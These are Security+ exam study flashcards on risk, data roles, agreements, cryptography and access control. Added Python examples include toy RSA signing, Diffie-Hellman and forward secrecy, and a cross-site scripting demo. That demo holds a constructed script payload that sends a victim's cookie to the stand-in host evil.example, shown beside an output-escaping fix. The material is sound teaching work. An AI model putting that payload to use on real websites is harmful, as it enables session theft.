exam 3 Flashcards
What is the difference between Mean Time To Restore and Mean Time Between Failures?
MTTR (Mean Time To Restore, also called Mean Time To Repair) is the average time required to get a failed system back up and running after a failure.
MTBF (Mean Time Between Failures) is the predicted average time a system stays operational between one failure and the next, measured from a restore to the next failure. A higher MTBF means failures are less frequent; a lower MTTR means each failure is resolved faster.
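Worked example, added here and not part of the original flashcards: both metrics computed from a constructed outage log, plus the steady-state availability they imply. The dates and durations are the example's own assumptions; the point to notice is that MTBF is measured as uptime (from a restore to the next failure), not from failure to failure.

```python
from datetime import datetime

# Constructed outage log for one service (assumption, not real data):
# each entry is (time the failure began, time service was restored).
INCIDENTS = [
    (datetime(2024, 3, 1, 9, 0), datetime(2024, 3, 1, 9, 20)),      # 20 min outage
    (datetime(2024, 3, 11, 14, 0), datetime(2024, 3, 11, 14, 40)),  # 40 min outage
    (datetime(2024, 3, 21, 2, 0), datetime(2024, 3, 21, 2, 30)),    # 30 min outage
]


def mttr_minutes(incidents):
    """Mean Time To Restore: average length of an outage, failure -> restore."""
    downtimes = [(up - down).total_seconds() for down, up in incidents]
    return sum(downtimes) / len(downtimes) / 60


def mtbf_hours(incidents):
    """Mean Time Between Failures: average UPTIME, measured from one restore
    to the next failure (failure-to-failure would wrongly include the downtime)."""
    uptimes = [
        (incidents[i + 1][0] - incidents[i][1]).total_seconds()
        for i in range(len(incidents) - 1)
    ]
    return sum(uptimes) / len(uptimes) / 3600


def availability(incidents):
    """Steady-state availability = MTBF / (MTBF + MTTR), both in the same unit."""
    mtbf = mtbf_hours(incidents) * 60  # convert to minutes to match MTTR
    mttr = mttr_minutes(incidents)
    return mtbf / (mtbf + mttr)


if __name__ == "__main__":
    print(f"MTTR = {mttr_minutes(INCIDENTS):.1f} min")      # 30.0 min
    print(f"MTBF = {mtbf_hours(INCIDENTS):.1f} h")          # 236.0 h
    print(f"availability = {availability(INCIDENTS):.4%}")
```

With this log the service fails roughly every ten days and takes half an hour to restore, which is about 99.79% availability; shortening MTTR (faster restore) and lengthening MTBF (more reliable components) are the two levers.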
What is the difference between Recovery Point Objective and Recovery Time Objective?
An RPO (Recovery Point Objective) is the point in time to which data must be recovered; it sets the maximum amount of data loss, measured in time, that the organization can tolerate. A four-hour RPO means backups or replication must capture data at least every four hours.
An RTO (Recovery Time Objective) is the maximum acceptable time to get a system back to an agreed level of operation after a failure. A recovered system may not be completely repaired, but it is running well enough to maintain that level of operation. Both are the service level goals the recovery plan works toward.
What is the difference between a Processor, Owner, Controller, and Custodian?
A data processor processes the data on behalf of, and under the instructions of, the data controller. This is often a different group within the organization or a third-party company.
In this example, the third-party financial organization is the data processor of the employee’s financial data.
The incorrect answers:
B. Owner
The data owner is often an executive of the company and is ultimately responsible for the use and security of this data.
C. Controller
A data controller decides why and how the data is processed. In this example, the human resources team would control the access and use of the employee data and direct the third-party processor.
D. Custodian
A data custodian is responsible for the day-to-day handling of the data, implementing the controls that keep it accurate, private, and secure. Many organizations assign data custodians to ensure all data is properly protected and maintained.
Sam would like to send an email to Jack and have Jack verify that Sam was the sender of the email. Which of these should Sam use to provide this verification?
Digitally sign with Sam's private key. The sender of a message digitally signs with their own private key to ensure integrity, authentication, and non-repudiation of the signed contents. The recipient validates the signature with the sender's public key, so only someone holding Sam's private key could have produced a signature that verifies.
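Worked example, added here and not from the original flashcards: Sam signs with his private key, Jack verifies with Sam's public key, and both a tampered message and a signature made with someone else's private key fail. This is textbook RSA with small fixed primes chosen as an assumption so it runs instantly; real keys are 2048 bits or more, generated randomly, and real signatures use a padding scheme such as RSA-PSS from a vetted library.

```python
import hashlib

# Toy, textbook RSA for illustration only (assumption): small fixed primes,
# no padding. Never use this construction for real signatures.
SAM_PRIMES = (2147483647, 2305843009213693951)      # 2^31 - 1, 2^61 - 1
MALLORY_PRIMES = (4294967291, 2305843009213693951)  # 2^32 - 5, 2^61 - 1
E = 65537


def make_keypair(primes):
    """Return (public_key, private_key) as ((e, n), (d, n))."""
    p, q = primes
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(E, -1, phi)  # modular inverse of e (Python 3.8+)
    return (E, n), (d, n)


def message_digest(message: bytes, n: int) -> int:
    """Hash the message (this is what gives integrity) and reduce it mod n."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(message: bytes, private_key) -> int:
    """Sam signs with his PRIVATE key: s = H(m)^d mod n."""
    d, n = private_key
    return pow(message_digest(message, n), d, n)


def verify(message: bytes, signature: int, public_key) -> bool:
    """Jack verifies with Sam's PUBLIC key: s^e mod n must equal H(m) mod n."""
    e, n = public_key
    return pow(signature, e, n) == message_digest(message, n)


def demo():
    """Return (genuine verifies, tampered message fails, other key fails)."""
    sam_pub, sam_priv = make_keypair(SAM_PRIMES)
    _, mallory_priv = make_keypair(MALLORY_PRIMES)
    email = b"Jack, please wire the vendor payment today. -- Sam"
    sig = sign(email, sam_priv)
    genuine = verify(email, sig, sam_pub)
    tampered = verify(email.replace(b"vendor", b"Mallory"), sig, sam_pub)
    forged = verify(email, sign(email, mallory_priv), sam_pub)
    return genuine, tampered, forged


if __name__ == "__main__":
    print(demo())  # (True, False, False)
```

The three outcomes map to the three properties on the card: the genuine check is authentication, the tampered check is integrity, and because only Sam's private key produces a signature that his public key accepts, Sam cannot later deny sending it (non-repudiation).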
Data hashing
Data hashing creates a unique message digest based on the stored data. If the data is tampered with, a hash taken after the change will differ from the original value. This allows a forensic engineer to identify whether information has been changed, and it is what would allow a future analyst to verify the data as original and unaltered.
Web filters
Web filters contain a large database of categorized website addresses, and this allows an administrator to create rules to block browsing attempts to specific content. For example, a content filter may allow browsing to news and business sites, but block browsing attempts to gaming and shopping sites.
❍ A. Service level agreement
❍ B. Memorandum of understanding
❍ C. Non-disclosure agreement
❍ D. Acceptable use policy
A service level agreement (SLA) is used to contractually define the minimum terms for services. In this example, the medical imaging company would require an SLA from the network provider for the necessary throughput and uptime metrics.
The incorrect answers:
B. Memorandum of understanding
A memorandum of understanding (MOU) is an informal letter of intent between parties. An MOU is generally not a legally binding contract, so there are no enforceable service obligations associated with its content.
C. Non-disclosure agreement
A non-disclosure agreement (NDA) is used between entities to prevent the use and dissemination of confidential information.
D. Acceptable use policy
An acceptable use policy (AUP) commonly details the rules of behavior for employees using an organization’s network and computing resources.
❍ A. SLA
❍ B. SOW
❍ C. NDA
❍ D. BPA
A SOW (Statement of Work) is a detailed list of tasks, items, or processes to be completed by a third-party. The SOW lists the job scope, location, deliverables, and any other specifics associated with the agreement. The SOW is also used as a checklist to verify the job was completed properly by the service provider.
The incorrect answers:
A. SLA
An SLA (Service Level Agreement) sets the minimum terms of service between a customer and a service provider. This agreement often contains terms for expected uptime, response time requirements, and other minimum service levels required by the customer.
C. NDA
An NDA (Non-Disclosure Agreement) is a confidentiality agreement between parties. The agreement is designed to protect information such as trade secrets, business activities, or anything else included in the NDA. An NDA does not generally contain an itemized list of service requests.
D. BPA
A BPA (Business Partners Agreement) is used between entities going into business together. A list of itemized service requests would not be part of a BPA.
SD-WAN
An SD-WAN (Software-Defined Wide Area Network) applies software-defined networking to the WAN, so branch users can communicate efficiently and directly with cloud-based applications instead of backhauling all traffic through a central data center.
Diffie-Hellman
In the Diffie-Hellman algorithm each side combines its own private key with the other side's public key and both arrive at the same session key. This allows two devices to create and use a shared session key without ever sending the key itself across the network.
When verifying the legitimacy of a website, you check its digital certificate to ensure a secure connection. Which cryptographic method is used to bind the certificate to a trusted issuer, like a certificate authority?
Digital signatures are essential for digital certificates. A certificate authority (CA) acts as a trusted third party and signs the certificate with the CA's own private key. Your browser validates that signature with the CA's public key from its trust store; a valid signature confirms the certificate's authenticity and that it originates from a legitimate CA.
Data custodian
Data custodian is the most fitting choice. They are responsible for the day-to-day care, control, access, and security of the customer data within the database. This includes managing access rights to ensure only authorized personnel can view or modify the data.
Data processor
A data processor performs specific tasks on the data as instructed by the data controller or owner. It would not typically manage access rights itself.
Logic Bombs
A logic bomb is malware programmed to detonate and cause damage when a specific trigger condition is met. It might explain sudden system issues, but the description does not indicate a specific trigger being met (e.g., a date or event).
Worm
A worm is a self-replicating malicious program that spreads across networks. While it could cause performance issues, it would not explain the pop-up messages or the cursor moving on its own, which point to a remote access tool.
Residual risk
This is the correct term for risks that remain after implementing control measures.
Transferred risk
This refers to risks that have been shifted to a third party, such as through insurance.
Penetration test
A pen test simulates a real-world attack by ethical hackers who attempt to exploit vulnerabilities in the system. This proactive approach helps identify security weaknesses before attackers can discover them. In this scenario, the isolated test environment provides a safe space for pen testers to probe the system for vulnerabilities without impacting production systems.
Vulnerability scanner
Vulnerability scanners are automated tools that can identify known vulnerabilities in systems. They’re a good starting point, but they might miss zero-day vulnerabilities or those requiring human expertise to exploit.
Risk tolerance
This represents the level of risk an organization is willing to accept. By understanding the organization’s risk tolerance, the manager can determine the appropriate level of resources to allocate for risk mitigation.
SED
Self-encrypting drive (SED): encrypts data at rest in the laptop's drive hardware, so the contents are unreadable without the authentication key if the device is lost or stolen while powered off or locked. This is critical for field laptops where physical security might be a challenge; note that an SED does not protect data on a drive that is already unlocked and running.
A security team discovered a previously patched vulnerability reappearing on servers after a recent update. What security practice can help prevent similar issues in the future?
Master image
A master image is a reference image used to deploy consistent server configurations. While helpful for maintaining consistency, it does not prevent a patch from reintroducing a vulnerability unless the master image itself is rebuilt with the latest secure patches; a stale image silently redeploys the old, vulnerable version.
Continuous monitoring
Continuous monitoring involves ongoing security checks and scans to identify potential vulnerabilities and threats in systems. By continuously monitoring for vulnerabilities, the security team could have detected the reintroduced issue before it caused problems. This allows for quicker response and patching to prevent exploitation.
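Worked example, added here and not from the original flashcards: the kind of check a continuous-monitoring scan runs after every deployment, comparing installed package versions against a baseline of versions known to carry the fixes that were previously applied. Package names and version numbers are constructed for illustration; the one real pitfall shown is that versions must be compared numerically, not as strings.

```python
# Baseline of versions that carry the fixes we already applied (constructed
# names and numbers, not real packages).
PATCHED_BASELINE = {
    "libfoo": "3.0.13",
    "bar-server": "8.5.0",
    "baz-agent": "1.9.15",
}

# What a scan found on a server after the update re-imaged it (constructed).
INSTALLED_AFTER_UPDATE = {
    "libfoo": "3.0.11",     # older than the baseline: the patched bug is back
    "bar-server": "8.5.0",
    "baz-agent": "1.10.2",  # newer than the baseline: fine
}


def parse_version(version: str) -> tuple:
    """Split into integers so that 3.0.9 < 3.0.13; as strings "3.0.9" > "3.0.13"."""
    return tuple(int(part) for part in version.split("."))


def find_regressions(installed: dict, baseline: dict = PATCHED_BASELINE) -> dict:
    """Return {package: (installed, required)} for every package that is older
    than the patched baseline or missing entirely. Each hit is an alert."""
    regressions = {}
    for package, required in baseline.items():
        current = installed.get(package)
        if current is None or parse_version(current) < parse_version(required):
            regressions[package] = (current, required)
    return regressions


if __name__ == "__main__":
    for pkg, (cur, req) in find_regressions(INSTALLED_AFTER_UPDATE).items():
        print(f"REGRESSION {pkg}: installed {cur}, baseline requires {req}")
```

Running this from the deployment pipeline, and again on a schedule, catches the reintroduced version before an attacker does; the fix is then to rebuild the master image rather than to patch each server by hand.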
EPP
Endpoint Protection Platform (EPP): EPP focuses on protecting individual devices rather than the overall data flow between on-premises and cloud environments.
Cloud Access Security Broker (CASB)
A CASB is specifically designed to secure cloud applications by acting as a gatekeeper between the on-premises environment and the cloud. It provides visibility and control over data flow, enabling organizations to enforce security policies and protect sensitive information.
Maintaining the baseline
This involves making ongoing adjustments and updates to the baseline to ensure it remains effective and up-to-date.
Establishing the baseline
This is the initial creation of the baseline.
DLP
Data loss prevention (DLP): This technology monitors and controls data movement across network boundaries, preventing sensitive information from being copied to unauthorized devices like USB drives.
EDR
Endpoint detection and response (EDR): Focuses on detecting and responding to threats on endpoint devices, not preventing data leakage.
TLS
TLS (Transport Layer Security): when negotiated with ephemeral key-exchange cipher suites (DHE or ECDHE), TLS provides perfect forward secrecy, meaning that the compromise of long-term keys does not compromise the security of past communication sessions.
Quantitative risk assessment
This method uses numerical data and statistical analysis to assign monetary values to risks.
Qualitative risk assessment
This type of assessment relies on subjective judgments and expert opinions to prioritize risks based on their potential impact and likelihood, without assigning specific monetary values.
AUP
Acceptable Use Policy (AUP): An AUP specifically outlines the rules and expectations for using company IT resources, ensuring employees understand what is permitted and prohibited.
cipher
This is a cryptographic algorithm used to encrypt data, making it unreadable to anyone without the correct decryption key. This ensures that only the intended recipient can access the sensitive information.
Elliptic curve cryptography
This is a modern and efficient family of asymmetric algorithms (ECDH for key agreement, ECDSA for signatures) that gives the same security as RSA with much smaller keys, which makes it well suited to mobile devices with limited CPU, battery, and bandwidth.
Hashing
Hashing is a one-way function used for data integrity verification, not encryption.
Credential replay
This attack involves capturing and reusing valid authentication credentials, exactly as described in the scenario. The attacker is replaying a previously captured login session to gain unauthorized access.
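Worked example, added here and not from the original flashcards: a login message that is bound to a random nonce and a timestamp and protected with an HMAC, and a server that refuses to accept the same capture twice. The shared secret, the fixed clock values, and the 30-second freshness window are the example's own assumptions.

```python
import hashlib
import hmac
import json
import secrets
import time

# Constructed example (assumption): one pre-shared key and an injectable clock
# so the flow is reproducible; a real system derives per-user keys.
SHARED_SECRET = b"demo-shared-secret"
FRESHNESS_WINDOW = 30  # seconds a message stays valid


def build_auth_message(user: str, now: float = None, secret: bytes = SHARED_SECRET) -> dict:
    """Client side: bind the login to a fresh nonce and a timestamp, then MAC it."""
    now = time.time() if now is None else now
    body = {"user": user, "nonce": secrets.token_hex(16), "ts": int(now)}
    payload = json.dumps(body, sort_keys=True)
    tag = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    return {"payload": payload, "tag": tag}


class AuthServer:
    """Server side: a captured message cannot be reused, because its nonce is
    remembered for as long as its timestamp would still be accepted."""

    def __init__(self, secret: bytes = SHARED_SECRET):
        self.secret = secret
        self.seen_nonces = {}  # nonce -> time after which it can be forgotten

    def verify(self, message: dict, now: float = None) -> str:
        now = time.time() if now is None else now
        payload = message["payload"].encode()
        expected = hmac.new(self.secret, payload, hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, message["tag"]):
            return "rejected: bad tag"            # tampered or forged
        body = json.loads(payload)
        if abs(now - body["ts"]) > FRESHNESS_WINDOW:
            return "rejected: stale timestamp"    # old capture replayed much later
        self.seen_nonces = {n: exp for n, exp in self.seen_nonces.items() if exp > now}
        if body["nonce"] in self.seen_nonces:
            return "rejected: replayed nonce"     # same capture replayed within the window
        self.seen_nonces[body["nonce"]] = now + FRESHNESS_WINDOW
        return "accepted: " + body["user"]


if __name__ == "__main__":
    server = AuthServer()
    captured = build_auth_message("sam", now=1000)
    print(server.verify(captured, now=1001))  # accepted: sam
    print(server.verify(captured, now=1005))  # rejected: replayed nonce
```

The timestamp alone is not enough (an attacker can replay within the window) and the nonce alone is not enough (the server would have to remember nonces forever); together they bound both the replay window and the size of the nonce store.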
DAC
Discretionary access control (DAC) lets the owner of a file or other object decide who else may access it. That is less restrictive and does not meet the requirement for mandatory, centrally enforced control based on data sensitivity.
MAC
Mandatory access control (MAC) enforces access based on security labels assigned to data and clearances assigned to users. The labels are set by policy, not by the data's owner, so a user cannot share sensitive information with someone whose clearance does not cover its label.
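Worked example, added here and not from the original flashcards: a minimal label lattice in the Bell-LaPadula style (a hierarchical level plus need-to-know compartments), with the two MAC rules beside a DAC file whose owner hands out access at will. The level names and compartments are constructed.

```python
# Hierarchical sensitivity levels (constructed names); higher number = more sensitive.
LEVELS = {"public": 0, "internal": 1, "confidential": 2, "secret": 3}


class Label:
    """A security label on data, or a user's clearance: a level plus compartments."""

    def __init__(self, level: str, compartments=()):
        self.level = LEVELS[level]
        self.compartments = frozenset(compartments)

    def dominates(self, other: "Label") -> bool:
        return self.level >= other.level and self.compartments >= other.compartments


def mac_can_read(clearance: Label, data: Label) -> bool:
    """Simple security property, "no read up": the clearance must dominate the data."""
    return clearance.dominates(data)


def mac_can_write(clearance: Label, data: Label) -> bool:
    """*-property, "no write down": the target label must dominate the user's
    clearance, so secret data cannot be copied into a lower-labelled file."""
    return data.dominates(clearance)


class DacFile:
    """DAC contrast: the owner grants access at their own discretion via an ACL."""

    def __init__(self, owner: str):
        self.owner = owner
        self.acl = {owner: {"read", "write"}}

    def grant(self, by: str, to: str, permission: str) -> bool:
        if by != self.owner:
            return False  # only the owner decides
        self.acl.setdefault(to, set()).add(permission)
        return True

    def allowed(self, user: str, permission: str) -> bool:
        return permission in self.acl.get(user, set())


if __name__ == "__main__":
    secret_hr = Label("secret", {"HR"})
    print(mac_can_read(Label("secret", {"HR", "FIN"}), secret_hr))   # True
    print(mac_can_read(Label("confidential", {"HR"}), secret_hr))    # False: level too low
    print(mac_can_read(Label("secret", {"FIN"}), secret_hr))         # False: no HR need-to-know
```

Notice there is no grant() under MAC: even a user cleared for secret HR data has no way to give it to a colleague without the HR compartment, whereas the DAC owner can add anyone to the ACL.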
ESP
Encapsulating Security Payload (ESP) protects IPsec traffic by encrypting the encapsulated packet and, when configured with an integrity algorithm, authenticating it. It ensures confidentiality, preventing unauthorized access to the data, and protects against tampering in transit.
IaC
Infrastructure as Code (IaC): This approach treats infrastructure resources like servers, networks, and storage as code, allowing them to be managed and provisioned using scripts and automation tools. This improves efficiency, reduces errors, and enables consistent configurations.
IaaS
Provides computing resources like servers and storage, but doesn’t address automation of infrastructure provisioning.
EKU
Extended Key Usage (EKU) specifies the intended purpose of the certificate, such as client authentication, email protection, or code signing. It does not relate to covering multiple domain names; that is the Subject Alternative Name (SAN) extension. EKU is also not within the scope of the Security+ exam and not covered in the objectives. This type of question requires you to know what is and isn't within the exam objectives.
AAA
Authentication, authorization, and accounting
Failover clustering
This solution involves multiple servers working together, with one acting as the primary server and the other as a standby. If the primary server fails, the standby server automatically takes over, ensuring uninterrupted service.
CASB
Cloud Access Security Broker (CASB) provides visibility and control over cloud services and data, including the ability to monitor data transfers, detect threats, and enforce data encryption policies. It acts as a gatekeeper between the on-premises environment and the cloud, ensuring data security.
XSS
Cross-site scripting (XSS): this is the correct answer, as it involves the injection of a malicious script into a trusted website, which is then executed by the victim's browser in that site's context. This is exactly the scenario described in the prompt.
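Worked example, added here and not from the original flashcards: a server-side template that concatenates a user comment straight into the page (the XSS bug) beside the same page rendered with output encoding, plus the attribute-context variant that needs quoting as well as escaping. The attacker's comment is constructed; the domain in it is a placeholder.

```python
import html

# Constructed attacker input (assumption): a "comment" that is really a script
# which ships the victim's cookie to an attacker-controlled host.
ATTACKER_COMMENT = '<script>new Image().src="https://evil.example/?c="+document.cookie</script>'


def render_vulnerable(comment: str) -> str:
    """XSS: user input is concatenated into the HTML unchanged, so the victim's
    browser executes the attacker's script with the trusted site's origin."""
    return "<p>Comment: " + comment + "</p>"


def render_escaped(comment: str) -> str:
    """Output encoding for HTML body context: & < > " ' become entities, so the
    browser displays the text and never parses a <script> tag."""
    return "<p>Comment: " + html.escape(comment, quote=True) + "</p>"


def render_attribute(value: str) -> str:
    """Attribute context: the value must be quoted AND escaped. Escaping only < >
    would let a stray quote close the attribute and add an event handler."""
    return '<input name="q" value="' + html.escape(value, quote=True) + '">'


def has_live_script(page: str) -> bool:
    """Crude detector for the demo: an un-encoded <script tag in the output."""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(has_live_script(render_vulnerable(ATTACKER_COMMENT)))  # True
    print(has_live_script(render_escaped(ATTACKER_COMMENT)))     # False
    print(render_attribute('" onmouseover="alert(1)'))
```

In practice use a template engine with auto-escaping turned on and add a Content Security Policy as defense in depth; the encoding rule also differs by context (HTML body, attribute, JavaScript, URL), which is why hand-rolled escaping so often misses one.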
Right to be forgotten
This is the correct term for an individual’s right to request the deletion of their personal data.
Right to data access
Grants individuals the right to access their personal data held by an organization.
Right to data portability
Allows individuals to transfer their personal data between different organizations.
PDU
Power distribution unit (PDU): This device provides power outlets and often includes monitoring capabilities for power consumption, enabling remote management and control.
Sensitive
Employee salary information is typically considered sensitive and should be protected from unauthorized disclosure.
Public
This classification is for information that can be freely shared without restrictions.
Playbook
This is a step-by-step guide for handling specific incidents, providing clear procedures for security teams to follow.
Automation
Automating compliance processes can help streamline tasks, reduce human error, and ensure that tasks are completed consistently. This is especially beneficial for large companies with extensive obligations, as it improves both accuracy and efficiency.
Corrective control
This type of control helps mitigate the impact of a security incident after it has occurred.
Compensating control
This type of control is implemented when a primary control (like the existing security measures) might not be fully effective. The backup and restore process acts as a secondary layer of protection to mitigate the impact of a successful attack.
A company is considering implementing asymmetric encryption to protect sensitive data. Which use case would best leverage the strengths of asymmetric encryption?
Authenticating users. The strength of asymmetric cryptography is that the private key never has to be shared, so proving possession of it (by signing a challenge) authenticates the holder without distributing a secret. Encrypting large volumes of data is not its strength: asymmetric operations are slow, so bulk data is protected with a symmetric key that is exchanged or wrapped using the asymmetric keys.
PFS
Perfect forward secrecy: this cryptographic property ensures that the compromise of a long-term key (such as a server's private key) does not compromise the security of previously recorded sessions, because each session used its own ephemeral key that was discarded afterwards.
Preventive
A locked door prevents unauthorized access to the server room, acting as a proactive security measure.
S/MIME
S/MIME is a standard used for encrypting and signing emails, providing confidentiality, integrity, authentication, and non-repudiation. It’s commonly used in legal and business communications to securely exchange sensitive information, ensuring the recipient is authenticated, and the contents remain confidential and unaltered.
SCAP
Security Content Automation Protocol (SCAP): a framework for specifying and communicating security data in a standard form. It does not itself define a vulnerability scoring system; the standardized scores come from CVSS, which SCAP incorporates as one of its components.
Perfect forward secrecy
This cryptographic concept involves generating unique session keys for each communication session, ensuring that the compromise of long-term keys does not compromise the security of past communications.
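Worked example, added here and not from the original flashcards, covering both the Diffie-Hellman card earlier in this set and the perfect forward secrecy cards: two parties derive the same session key from values an eavesdropper can see, fresh exponents give every session an independent key, and by contrast a reused long-term exponent lets an attacker who later steals it recompute every recorded session. The 31-bit group below is a toy assumption (its generator 7 is a known primitive root of 2^31 - 1) and is far too small for real use; deployments use vetted groups such as RFC 7919 ffdhe2048 or ECDHE curves, and authenticate the public values so an attacker cannot substitute his own.

```python
import hashlib
import secrets

# Toy group for illustration (assumption): p = 2^31 - 1 is prime and 7 is a
# primitive root of it, so 7^x covers the whole group. Brute-forceable; demo only.
P = 2147483647
G = 7


class Party:
    """One side of a Diffie-Hellman exchange. The private exponent never leaves
    this object; only the public value is sent across the network."""

    def __init__(self):
        self.private = secrets.randbelow(P - 2) + 2
        self.public = pow(G, self.private, P)

    def session_key(self, peer_public: int) -> str:
        """Combine my private key with the peer's public key: (g^b)^a = (g^a)^b mod p,
        then hash the shared secret into a symmetric session key."""
        shared = pow(peer_public, self.private, P)
        return hashlib.sha256(shared.to_bytes(4, "big")).hexdigest()


def run_session():
    """Return (alice's key, bob's key, the two values an eavesdropper saw)."""
    alice, bob = Party(), Party()
    on_the_wire = (alice.public, bob.public)
    return alice.session_key(bob.public), bob.session_key(alice.public), on_the_wire


def ephemeral_sessions(count: int = 3) -> list:
    """Ephemeral DH (the 'E' in DHE/ECDHE): fresh exponents for every session, so
    each session key is independent and can be discarded. That is forward secrecy."""
    return [run_session()[0] for _ in range(count)]


def static_key_breach(count: int = 3) -> bool:
    """Contrast: Bob reuses ONE long-term private exponent. An attacker who recorded
    the public values and later steals that exponent recovers every past key."""
    bob = Party()
    transcript = []  # (alice's public value as seen on the wire, the real session key)
    for _ in range(count):
        alice = Party()
        transcript.append((alice.public, alice.session_key(bob.public)))
    stolen = bob.private  # later compromise of Bob's long-term key
    recovered = [
        hashlib.sha256(pow(alice_pub, stolen, P).to_bytes(4, "big")).hexdigest()
        for alice_pub, _ in transcript
    ]
    return recovered == [key for _, key in transcript]


if __name__ == "__main__":
    a, b, wire = run_session()
    print(a == b, wire)                 # True, the two public values only
    print(ephemeral_sessions())         # three different keys
    print(static_key_breach())          # True: static key, all sessions recovered
```

The last function is the whole argument for PFS: with a static key the recorded ciphertext is only as safe as the key's future, while with ephemeral keys there is nothing left to steal once the session ends.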
MTTR
Mean time to repair (MTTR): This metric measures the average time it takes to restore a system to full operation after a failure. In this case, the MTTR is 20 minutes.
A company is developing a new e-commerce platform to process credit card payments securely. Which cryptographic algorithm is commonly used for encrypting data in transit and for digital signatures in this context?
RSA – This is an asymmetric algorithm that uses a key pair, a public key and a private key. It is widely used in e-commerce inside the TLS handshake (to sign the handshake and, historically, to encrypt the key that protects the session) and for digital signatures, providing authentication and data integrity; the bulk of the data in transit is then encrypted with a fast symmetric cipher such as AES.
Risk mitigation
This is the correct answer. It involves taking proactive steps to reduce the impact or probability of a risk occurring. This might include implementing security controls, such as firewalls, intrusion detection systems, or employee training.